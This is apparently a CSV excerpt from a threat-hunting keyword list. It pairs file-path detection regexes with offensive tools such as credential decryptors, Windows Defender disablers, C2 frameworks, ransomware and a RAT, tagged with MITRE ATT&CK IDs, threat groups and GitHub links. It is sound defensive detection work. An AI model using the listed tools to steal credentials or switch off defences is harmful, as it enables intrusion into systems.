"*/decipher_mremoteng.iml*",".{0,1000}\/decipher_mremoteng\.iml.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","6488"
"*/DecryptAutoLogon.exe*",".{0,1000}\/DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6489"
"*/DecryptAutoLogon.exe*",".{0,1000}\/DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","1","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","6490"
"*/DecryptAutoLogon.git*",".{0,1000}\/DecryptAutoLogon\.git.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","1","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","6491"
"*/decrypt-chrome-passwords*",".{0,1000}\/decrypt\-chrome\-passwords.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","N/A","10","10","966","211","2024-07-31T14:08:55Z","2020-12-28T15:11:12Z","6492"
"*/decrypted.dmp*",".{0,1000}\/decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","6493"
"*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","6494"
"*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6495"
"*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6496"
"*/Decrypt-RDCMan.ps1*",".{0,1000}\/Decrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","1","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","6497"
"*/DecryptRDCManager.git*",".{0,1000}\/DecryptRDCManager\.git.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","6498"
"*/DecryptTeamViewer.exe*",".{0,1000}\/DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6499"
"*/DecryptTeamViewer.exe*",".{0,1000}\/DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","6500"
"*/DecryptTeamViewer.git*",".{0,1000}\/DecryptTeamViewer\.git.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","6501"
"*/DEDSEC-RANSOMWARE.git*",".{0,1000}\/DEDSEC\-RANSOMWARE\.git.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","6502"
"*/deepce.sh *--install*",".{0,1000}\/deepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6503"
"*/deepce.sh*",".{0,1000}\/deepce\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6504"
"*/deepmagic.com_top500prefixes.txt*",".{0,1000}\/deepmagic\.com_top500prefixes\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","6505"
"*/deepmagic.com_top50kprefixes.txt*",".{0,1000}\/deepmagic\.com_top50kprefixes\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","6506"
"*/defanger.go*",".{0,1000}\/defanger\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#linux","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","6507"
"*/DefaultCreds_db.json*",".{0,1000}\/DefaultCreds_db\.json.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","6508"
"*/Defeat-Defender-V1.2.0.git*",".{0,1000}\/Defeat\-Defender\-V1\.2\.0\.git.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","6509"
"*/Defender Control.zip*",".{0,1000}\/Defender\sControl\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6510"
"*/defender-control.git*",".{0,1000}\/defender\-control\.git.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","6511"
"*/defendercontrol.zip*",".{0,1000}\/defendercontrol\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6512"
"*/defender-exclusions.ps1*",".{0,1000}\/defender\-exclusions\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","6513"
"*/defender-exclusions/*defender*",".{0,1000}\/defender\-exclusions\/.{0,1000}defender.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6514"
"*/defender-exclusions/*exclusion*",".{0,1000}\/defender\-exclusions\/.{0,1000}exclusion.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6515"
"*/defenderOff.rar*",".{0,1000}\/defenderOff\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6516"
"*/DefenderRemover.exe*",".{0,1000}\/DefenderRemover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","6517"
"*/DefenderRemover-x86.exe*",".{0,1000}\/DefenderRemover\-x86\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","6518"
"*/Defense_Evasion.sh*",".{0,1000}\/Defense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","6519"
"*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","6520"
"*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","6521"
"*/DeleteonReboot.exe*",".{0,1000}\/DeleteonReboot\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Schedules a file to be deleted on next Windows host reboot","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","6522"
"*/DeleteWD.dll*",".{0,1000}\/DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","6523"
"*/deluge-rpc-brute.nse*",".{0,1000}\/deluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6524"
"*/dementor.py*",".{0,1000}\/dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","6525"
"*/demiguise.py*",".{0,1000}\/demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","6526"
"*/demo.specula.com/*",".{0,1000}\/demo\.specula\.com\/.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","6527"
"*/demo_bof.c*",".{0,1000}\/demo_bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","6528"
"*/demon.x64.bin*",".{0,1000}\/demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6529"
"*/demon.x64.exe*",".{0,1000}\/demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6530"
"*/demon1.dll*",".{0,1000}\/demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6531"
"*/demosyscalls.exe*",".{0,1000}\/demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6532"
"*/Dendrobate.git*",".{0,1000}\/Dendrobate\.git.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6533"
"*/Dendron.bin*",".{0,1000}\/Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6534"
"*/Dendron.csproj*",".{0,1000}\/Dendron\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6535"
